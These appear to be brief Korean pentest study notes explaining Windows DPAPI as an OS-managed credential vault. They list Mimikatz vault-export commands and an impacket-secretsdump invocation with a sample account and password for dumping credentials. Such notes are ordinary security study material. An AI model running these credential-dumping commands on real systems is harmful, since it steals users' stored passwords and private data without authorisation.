요약

• DPAPI = Data Protection API
• 윈도우가 대신 관리해 주는 개인 금고
  • 크롬 브라우저나 카카오톡 같은 개별 앱들이 비밀번호를 매번 물어보지 않고 저장해두고 싶을 때, 윈도우에게 안전하게 보관해 달라고 맡기는 곳.
• 이 금고를 여는 가장 근본적인 열쇠는 윈도우 로그인 비밀번호 = 마스터키
• 사용자의 개인 데이터를 노출하고 싶으면 DPAPI를 타겟으로 잡는다.

공격

Mimikatz

# list the available vaults
vault::list

# extract the credentials
vault::cred /export

impacket-secretsdump

impacket-secretsdump WRK/Administrator:pass123@$IP -output local_dump